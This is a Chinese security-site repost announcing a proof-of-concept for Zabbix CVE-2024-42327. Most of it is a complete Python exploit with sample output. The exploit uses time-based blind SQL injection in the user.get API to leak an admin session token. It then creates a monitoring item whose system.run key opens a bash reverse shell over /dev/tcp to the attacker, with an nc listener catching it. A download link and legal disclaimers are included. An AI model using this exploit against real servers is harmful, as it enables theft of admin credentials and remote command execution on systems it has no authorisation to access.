【未经核实】Zabbix RCE PoC 公布

admin 2025年2月17日13:01:10评论4 views字数 7334阅读24分26秒阅读模式
声明:

文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

 

CVE-2024-42327

Zabbix 前端上的非管理员用户账户,无论是默认的 User 角色,还是具有 API 访问权限的任何其他角色,都可以利用这个漏洞。

在 CUser 类的 addRelatedObjects 函数中存在一个 SQLi,该函数是从 CUser.get 函数中调用的,每个具有 API 访问权限的用户都可以使用该函数。

PoC 说明

该 POC 可用于利用CVE-2024-42327泄露管理API身份验证令牌,并创建一个在Zabbix Server(Zabbix server < 6.0.32rc1, 6.4.17rc1, 7.0.1rc1)实现的反弹Shell。

示例:

python3 zabbix_privesc.py -t https://TARGET/zabbix/ -u USER -p PASSWORD[*] Authenticating ...[+] Login successful! USER API auth token: d0a05dfe4ce768f62e22bda4057c7c19[*] Starting data extraction ...[*] Extracting admin API auth token: af186c156b27a0c3f688b43f58c911c9[*] Getting host IDs ...[*] host.get response: {'jsonrpc': '2.0', 'result': [{'hostid': '10084', 'host': 'Zabbix server', 'interfaces': [{'interfaceid': '1'}]}], 'id': 1}[*] Starting listener and sending reverse shelll ...Ncat: Version 7.95 ( https://nmap.org/ncat )Ncat: Listening on [::]:4444Ncat: Listening on 0.0.0.0:4444Ncat: Connection from X.X.X.X:51004.zabbix@target:/$ ididuid=114(zabbix) gid=121(zabbix) groups=121(zabbix)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This script is used to exploit CVE-2024-42327 affecting Zabbix servers to leak the admin API authentication token and create an item to achieve a reverse shell.
"""

# Imports
from concurrent.futures import ThreadPoolExecutor
from threading import Timer
import argparse
import netifaces
import os
import requests
import string
import sys
import urllib.parse

# Disable SSL self-signed certificate warnings
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Constants
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
ENDC = "\033[0m"
ENCODING = "UTF-8"


def zabbix_authenticate():
    """Authenticate the user and retrieve the API token."""
    payload = {"jsonrpc": "2.0", "method": "user.login", "params": {"username": args.username, "password": args.password}, "id": 1}
    r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
    if r.status_code == 200:
        try:
            response_json = r.json()
            auth_token = response_json.get("result")
            if auth_token:
                print(f"[+] Login successful! {args.username} API auth token: {auth_token}")
                return auth_token
            else:
                print(f"{RED}[-] Login failed. Response: {response_json}{ENDC}")
                exit()
        except Exception as e:
            print(f"{RED}[-] Error: {str(e)}{ENDC}")
            exit()
    else:
        print(f"{RED}[-] HTTP request failed with status code {r.status_code}{ENDC}")
        exit()


def send_injection(auth_token, position, char):
    """Send an SQL injection payload and measure the response time."""
    payload = {
        "jsonrpc": "2.0",
        "method": "user.get",
        "params": {
            "output": ["userid", "username"],
            "selectRole": [
                "roleid",
                f"name AND (SELECT * FROM (SELECT(SLEEP({args.sleep_time} - "
                f"(IF(ORD(MID((SELECT sessionid FROM zabbix.sessions "
                f"WHERE userid=1 and status=0 LIMIT {args.row},1), "
                f"{position}, 1))={ord(char)}, 0, {args.sleep_time})))))BEEF)",
            ],
            "editable": 1,
        },
        "auth": auth_token,
        "id": 1,
    }
    r = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
    response_time = r.elapsed.total_seconds()
    return char, response_time


def extract_api_token_parallel(auth_token, position, charset=string.printable):
    """Extract the API token (multi-threaded)."""
    with ThreadPoolExecutor(max_workers=args.threads) as executor:
        futures = {executor.submit(send_injection, auth_token, position, char): char for char in charset}
        for future in futures:
            char, response_time = future.result()
            if args.sleep_time < response_time < args.sleep_time + 0.5:
                return char
    return None


def get_host_ids(api_token_admin):
    """Retrieve current host IDs and their associated interface IDs."""
    payload = {"jsonrpc": "2.0", "method": "host.get", "params": {"output": ["hostid", "host"], "selectInterfaces": ["interfaceid"]}, "auth": api_token_admin, "id": 1}
    response = requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
    if response.status_code == 200:
        try:
            response_json = response.json()
            print(f"[*] host.get response: {response_json}")
            result = response_json.get("result", [])
            if result:
                host_id = result[0]["hostid"]
                interface_id = result[0]["interfaces"][0]["interfaceid"]
                return host_id, interface_id
            else:
                print(f"{RED}[-] No hosts found in the response.{ENDC}")
                return None, None
        except Exception as e:
            print(f"{RED}[-] Error parsing response: {str(e)}{ENDC}")
            return None, None
    else:
        print(f"{RED}[-] Failed to retrieve host IDs. HTTP status code: {response.status_code}{ENDC}")
        return None, None


def send_reverse_shell_request(api_token_admin, host_id, interface_id):
    """Create an item with a reverse shell payload."""
    payload = {
        "jsonrpc": "2.0",
        "method": "item.create",
        "params": {
            "name": "rce",
            "key_": f'system.run[bash -c "bash -i >& /dev/tcp/{args.listen_ip}/{args.listen_port} 0>&1"]',
            "delay": 1,
            "hostid": host_id,
            "type": 0,
            "value_type": 1,
            "interfaceid": interface_id,
        },
        "auth": api_token_admin,
        "id": 1,
    }
    try:
        requests.post(url=args.url, json=payload, proxies=proxies, headers=headers, verify=False)
    except requests.exceptions.Timeout:
        pass  # Ignore timeout error


if __name__ == "__main__":
    # Parse arguments
    parser = argparse.ArgumentParser(description="POC for CVE-2024-42327 (Zabbix admin API token leak)")
    parser.add_argument("-t", "--url", help="Zabbix Target URL", required=True)
    parser.add_argument("-u", "--username", help="Zabbix username", required=True)
    parser.add_argument("-p", "--password", help="Zabbix password", required=True)
    parser.add_argument("--listen-ip", help="Listening IP / Interface", default="tun0")
    parser.add_argument("--listen-port", type=int, help="Listening Port", default=4444)
    parser.add_argument("--threads", type=int, help="Threads", default=10)
    parser.add_argument("--sleep-time", type=int, help="Sleep time", default=1)
    parser.add_argument("--row", type=int, help="Row index", default=0)
    parser.add_argument("--length", type=int, help="Max length", default=32)
    parser.add_argument(
        "-a",
        "--useragent",
        type=str,
        required=False,
        help="User agent to use when sending requests",
        default="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36",
    )
    parser.add_argument("-x", "--proxy", type=str, required=False, help="HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)")
    parser.add_argument("-v", "--verbose", action="store_true", required=False, help="Verbosity enabled - additional output flag")
    args = parser.parse_args()

    # Input-checking
    if not args.url.startswith("http://") and not args.url.startswith("https://"):
        args.url = "http://" + args.url
    args.url = urllib.parse.urlparse(args.url).geturl().strip("/").replace("api_jsonrpc.php", "") + "/api_jsonrpc.php"
    if args.proxy:
        proxies = {"http": args.proxy, "https": args.proxy}
    else:
        proxies = {}
    headers = {"User-Agent": args.useragent, "Content-Type": "application/json"}
    if args.listen_ip.count(".") != 3:
        try:
            args.listen_ip = netifaces.ifaddresses(args.listen_ip)[netifaces.AF_INET][0]["addr"]
        except:
            print(f"{RED}[-] Invalid interface/ip {args.listen_ip}{ENDC}")
            exit()

    print("[*] Authenticating ...")
    api_token = zabbix_authenticate()
    print("[*] Starting data extraction ...")
    api_token_admin = ""
    for position in range(len(api_token_admin) + 1, args.length + 1):
        for _ in range(1, 3):
            char = extract_api_token_parallel(api_token, position)
            if char and extract_api_token_parallel(api_token, position, char):
                api_token_admin += char
                sys.stdout.write(f"\r[*] Extracting admin API auth token: {api_token_admin}")
                sys.stdout.flush()
                break

    print("\n[*] Getting host IDs ...")
    host_id, interface_id = get_host_ids(api_token_admin)
    if host_id and interface_id:
        print("[*] Starting listener and sending reverse shelll ...")
        t = Timer(
            interval=1,
            function=send_reverse_shell_request,
            args=(
                api_token_admin,
                host_id,
                interface_id,
            ),
        )
        t.start()
        os.system(f"nc -lnvp {args.listen_port}")
    else:
        print(f"{RED}[-] Failed to retrieve host or interface ID.{ENDC}")

 

下载

https://github.com/godylockz/CVE-2024-42327

 

原文始发于微信公众号(骨哥说事):【未经核实】Zabbix RCE PoC 公布

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月17日13:01:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【未经核实】Zabbix RCE PoC 公布https://cn-sec.com/archives/3749725.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息